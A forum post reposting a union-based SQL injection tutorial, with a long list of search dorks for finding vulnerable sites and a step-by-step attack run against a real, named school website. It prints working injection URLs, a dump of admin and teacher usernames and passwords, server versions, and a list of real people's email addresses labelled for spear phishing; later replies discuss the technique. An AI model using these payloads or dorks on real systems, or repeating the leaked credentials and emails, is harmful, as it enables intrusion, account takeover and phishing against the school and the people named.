GreySec Forums

Full Version: SQL Injection [Union Based]
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Note: I got permission to repost Daisukes Tutorials on Hacksociety. I found them to be a waste not to post here as well. Daisuke Dan, if you're reading this and have decided to pick up your activity on greysec, I will transfer these to your account.
 
Credits: Daisuke Dan

 
 
[Image: DAISUKEE.png]
"Daisuke's katana can slay any security"
==========================

 
SQL Injection Union Based (Tutorial with screens)

 
0x00FFF#~ Summary
0x1 - Introduction
0x2 - Attack
0x3 - Links
0x4 - Credits & Authors

 
 
0x1#~ Introduction
 
# What is SQL Injection?
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database
 
[?] Info:
- It's a flaw in the web application,not the database, or the server.
- Can be injected into: Cookies, Forms, and URL parameters.

 
(What are Cookies ? http://en.wikipedia.org/wiki/HTTP_cookie)
Spoiler(Show)
[Image: mcdonalds-Chocolate-Chip-Cookie.png]LULZ
# Why UNION?
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.  
 
0x2#~ Attack
 
# Here is a list of d0rks to find SQL vulnerabilities:
A lot of these sites are already being hacked by other hackers but it's useful for training !
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

 
#------------------------------------------------------------------------------------+
| I have found a vulnerable website, i am not responsible of your damage.
| I prefer make a tutorial on a real site to be in a real situation :ninja:
#------------------------------------------------------------------------------------+
 
#[1] Find the vulnerable parameter
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 (no error)
hxxp://dbhspgoa.edu.in/Article.php?id=92' (error)

"Why error ? i don't see any error message Confused ???"
It's normal, in this case the error is the blank page:
Spoiler(Show)
[Image: iPfh7Uw.png]
 
#[2] Find the number of columns
To get to the point, what we're about to do is find how many columns the website has using No Error/Error statements.
 
Start by entering order by 100--
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 100-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 50-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 15-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 10-- (error)
hxxp://dbhspgoa.edu.in/Article.php?id=92 order by 9-- (no error)

 
The page displays correctly, so there are 9 columns:
Spoiler(Show)
[Image: F86KJsY.png]
 
#[3] Time to execute the UNION SELECT statement
We have to select the 9 columns:
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--

Wow, the number 4 appears, the 4th column is vulnerable to SQL injection and we'll extract the database from here:
Spoiler(Show)
[Image: lCSZvNf.png]
 
#[4] Informations
 
Now we know where to inject, you can reap some information about the database using: concat(the query())
 
Examples:
- version()
Spoiler(Show)
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(version()),5,6,7,8,9--

[Image: GzQpvav.png]
- @@datadir
Spoiler(Show)
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,@@datadir,5,6,7,8,9--

[Image: cfrF1is.png]
- @@hostname
Hmm I don't know why it doesn't work on this site Confused
 
- database()
Spoiler(Show)
Quote:http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT+1,2,3,concat(database()),5,6,7,8,9--

[Image: QFslYdF.png]
- user()
Spoiler(Show)
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,concat(user()),5,6,7,8,9--

[Image: Wg2XTzz.png]
-show all
Spoiler(Show)
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(database(),0x3c62723e,version(),0x3c62723e,@@datadir,0x3c62723e,user()),5,6,7,8,9--

0x3c62723e = 0x<br> converted in Hex = 0x3c62723e
[Image: qAa4dLp.png]
 
First let's look up some functions we're gonna use to extract table names (Important)
Quote:group_concat = grouping up data to a specific statement
table_name = tables names to be shown on screen
from = location of a specified statement
information_schema.tables = information in the database with table names in it
table_schema = tables in a database
database() = current database in the website
0x0a = a Hex code that creates a new line for organizing tables in an order

 
#[5] Show all tables of the database
I apply the functions I mentioned
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(table_name,0x0a),5,6,7,8,9 from information_schema.tables where table_schema=database()--

 
You should see this:
Code:
allumni ,article ,attendance_setting ,banner ,banner_zone ,content ,course ,csv ,division ,events ,ex_student ,exam_desc ,exam_setting ,exam_subjtotal ,exam_type ,final_grading ,grace ,grade_subject ,grading ,groups ,lecture_attendance ,login ,login_admin ,magazines ,mrksht ,navigation ,news ,notice ,photo_category ,photo_details ,pictures ,school_accnt ,schooldays_total ,semester ,standard ,standard_desc ,stream_desc ,stud_history ,stud_score ,student ,student_admission ,student_attendance ,student_exam ,student_grace ,student_grade ,student_gradesubject ,student_subject ,student_ya ,student_yrassessment ,subject ,tags ,tb_excelupload ,tb_quicklinks ,tb_videos ,teacher ,teacher_classes ,teacher_sub_assign ,teacher_subjects ,template ,thoughtforday ,year_assessment ,year_desc

 
Wow, there are two interesting columns: login and login_admin ! Humm "admin" I love this kind of column :troll:
Spoiler(Show)
[Image: zlIhpuG.png]
 
#[6] Extract data from columns
 
'login' seems to be having users information stored in it.
'login_admin' seems to be having admins information stored in it.
 
To do this, we're gonna have to alter some queries a bit. Look closely at this syntax:
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e5f61646d696e--

 
We need to replace:
table_name = replaced by "column_name"
information_schema.tables = replaced by "information_schema.columns"
table_schema = replaced by "table_name"
database() = replaced by "0x6c6f67696e5f61646d696e--" (login_admin)
 
To make a Hex readable, we put "0x" at the beginning. To enter that table using the syntax above, we have to convert that table name to Hex. If you are using the Firefox HackBar like me, you can do that:
 
[Image: sfYjirc.png]
 
And the result will be: 0x44616973756b65a
 
[Image: ofq1KlS.png]
 
Or: http://www.string-functions.com/hex-string.aspx
 
So! After have launched the injection in the column login_admin, we have 4 columns: admin_id, usernme, passwrd, logtime
Spoiler(Show)
[Image: MIyNZpo.png]
 
Let's look up some functions we replaced and know their uses.
Quote:group_concat(column_name,0x0a) = grouping the column names we're going to extract
information_schema.columns = column names stored in database
table_name = extracting column from a specific table
0xHEX_Code_Table = Specific table name converted to hex

 
Results:
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(admin_id,0x0a,passwrd,0x0a,logtime,0x0a,usernme,0x0a),5,6,7,8,9 from login_admin--

 
It show admin credentials:
Spoiler(Show)
                                                                                           
admin_id passwrd logtime usernme
13¢PÉÜœz;þß„mJ…  2014-02-11 01:25:09 admin
 
 
[Image: JumnMiy.png]
 
You can try with the column that you want. I use the same injection for the column login
 
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(column_name,0x0a),5,6,7,8,9 from information_schema.columns where table_name=0x6c6f67696e--

 
[Image: WFma7bu.png]
 
Then
 
Quote:
http://dbhspgoa.edu.in/Article.php?id=92 and 0 UNION SELECT 1,2,3,group_concat(a_id,0x0a,aname,0x0a,apass,0x3c62723e),5,6,7,8,9 from login--

 
[Image: OHWS0B2.png]
 
The final dump Smile
Code:
 ____        _           _         
|  _ \  __ _(_)___ _   _| | _____  
| | | |/ _` | / __| | | | |/ / _ \
| |_| | (_| | \__ \ |_| |   <  __/
|____/ \__,_|_|___/\__,_|_|\_\___|
            /\  The Hackers Bay | The Hackers Boat
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /====================================="
            \/
            
            
http://dbhspgoa.edu.in
goaed_ucation
5.0.37-standard
/var/lib/mysql/
goaed_ucationu@72.35.83.36
 
===============table admin================
admin_id, usernme, passwrd, logtime
1 3¢PÉÜœz;þß„mJ… 2014-02-11 01:25:09 admin  
 
===============table login================
a_id ,aname ,apass ,logtime ,fullname ,atype ,t_status ,a_schid ,school_news ,school_attendance ,school_magazine ,school_marksht ,school_stud ,school_allum ,school_content ,school_daythought ,school_event ,school_nav ,school_ban ,school_photo ,school_art ,school_courses ,school_teacher ,school_grace ,school_report ,school_admission ,school_testimonial ,school_excelsheet  
 
1 admin admin
,2 sanjeevh sanjeev
,3 teacher1cc teacher1cc
,4 teacher12gg teacher12gg
,5 teacher122 teacher122
,6 teacher100 teacher100
,7 teacher155 teacher155
,8 teacher177 teacher177
,9 teacher277 teacher277
,11 fragnel f2009
,12 test M»`¹¾l‚L:­d)µ¦Á
,13 donbosco De©«vý¹`MáúK
,14 pccc2010 †ÉZ¶ºšb˜C$‹4-|
,15 Roy W$÷_5g:¹ò@ÝÞ
,16 Principal ¿¦o¹ƒ4º~ÂëÞʲP
,17 francis ›Ùó ¹ÈìÕ'ꊡ¸†#
,18 xavmartin ›Ùó ¹ÈìÕ'ꊡ¸†#
,20 ishaniroy •¹òÄ xR¾–îƒSû³X
,22 namdevg >y Œö÷Úèá’#qž
,23 oscarn Ò² «5ÅÆl5B«ƒ3õc
,24 soniyas ´oÀ7#ÆWâ²Ë“ðû
,25 hclerk t/#`eó´©ýŠ†ê
,29 satishsanvol .óÜ:¿#ÿ²£Á3cw
,30 stmichael_e4r Ün‘šÆ‡H3«CÙS„-
,31 test ص¦†õ%„p8B×€bYàÛ
,32 test1 Ïf¥ÓeÜ9ê„š¨¬ó
,33 zantye ¢ ååçêaGÿF0c]Ì
 
================Misc================
Apache 1.3.41  
FrontPage/5.0.2.2510  
Apache module mod_perl/1.29 FrontPage/5.0.2.2510  
Mod SSL 2.8.31  
Open SSL 0.9.8b  
PHP 4.4.8  
 
Emails on dbhspgoa.edu.in (Spear phishing)
shaunakdsilva@yahoo.com  
bhatimax@gmail.com  
raunaq.ep@gmail.com  
ikasrikant@hotmail.com  
francisloves01@yahoo.com  
rishiwrite@gmail.com  
reuben.rebelo@rediff.com  
mobypirate@hotmail.com  
avesh.mahagaokar@hotmail.com  
mak.man@live.com  
clint.rb@rediffmail.com  
principal@dbhspgoa.edu.in  
jnmoses2000@yahoo.com  
maheshverma124@gmail.com  
reube.rebelo@rediff.com  
yamuna.bepari@gmail.com  
ethanferns4@gmail.com  
greynomenezes@gmail.com  
anthonydcosta95@gmail.com  
edesa@yahoomail.com  
dboscopanjim@yahoo.co.in

 
____________________________________________________________
 
0x3#~ Links
- http://hakipedia.com/index.php/SQL_Injection
- http://hex.online-toolz.com/tools/text-h...vertor.php
- https://www.owasp.org/index.php/XSS_Filt...heat_Sheet
 
0x4#~ Credits & Authors
Daisuke Dan - TheHackersBay
Penetration testing, Research Team
 
Have a nice day !  :ninja:
Quote:hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--
Wow, the number 4 appears, the 4th column is vulnerable to SQL injection and we'll extract the database from here:
#[4] Informations
 
Now we know where to injectconcat(the query())

This is very well put together, cool to see it step by step.

I'm confused why we have to work through column 4.
Is this just because column 4 is the same data type as the real query and hence why it was the only one to display? I guess it is probably the same column itself.

Would "union all attack_code" have worked too?
(12-06-2016, 04:32 AM)StickFigure Wrote: [ -> ]This is very well put together, cool to see it step by step.

I'm confused why we have to work through column 4.
Is this just because column 4 is the same data type as the real query and hence why it was the only one to display? I guess it is probably the same column itself.

Would "union all attack_code" have worked too?

You have to use column 4 for the query input in this case because it's the vulnerable column. Only the columns prone to SQL injection will successfully take your input, at least in this case and this type of injection.

While doing: hxxp://dbhspgoa.edu.in/Article.php?id=92 and 0 union select 1,2,3,4,5,6,7,8,9--

See output:
Spoiler(Show)
[Image: lCSZvNf.png]

The number 4 is marked out, thus that's the vulnerable column which should be used for the injection input.

Can't say whether or not "union all attack_code" will  work since I have never tried it but in my experience I believe it will not work they way you'd want it to.  You see the query, the vulnerable column will be displayed, sometimes It's hidden though but you can usually find it in the source code. Or depending on what kind of SQL injection, there's cases where injections are done through http headers or cookies iirc.

But no it shouldn't be possible to just union select all columns, you need the execution of the query to be made inside the vulnerable column. Although there's some cases where you can find 3 or 4 different vulnerable columns in the same injection. The normal praxis in my experience in those cases is to always choose the lowest integer/column for the injection (For ease and usability). But I believe it would probably be possible to do injection to several columns at the same time, if we take into account that all those columns are vulnerable.
(12-06-2016, 05:41 AM)Insider Wrote: [ -> ]The number 4 is marked out, thus that's the vulnerable column which should be used for the injection input.

Can't say whether or not "union all attack_code" will  work since I have never tried it but in my experience I believe it will not work they way you'd want it to.  You see the query, the vulnerable column will be displayed, sometimes It's hidden though but you can usually find it in the source code. Or depending on what kind of SQL injection, there's cases where injections are done through http headers or cookies iirc.

But no it shouldn't be possible to just union select all columns, you need the execution of the query to be made inside the vulnerable column. Although there's some cases where you can find 3 or 4 different vulnerable columns in the same injection. The normal praxis in my experience in those cases is to always choose the lowest integer/column for the injection (For ease and usability). But I believe it would probably be possible to do injection to several columns at the same time, if we take into account that all those columns are vulnerable.

Ah I see now. I was only looking at half the picture, of course the data needs to be pushed onto the page. For some reason was thinking the php functions were being evaluated as they got passed to the query.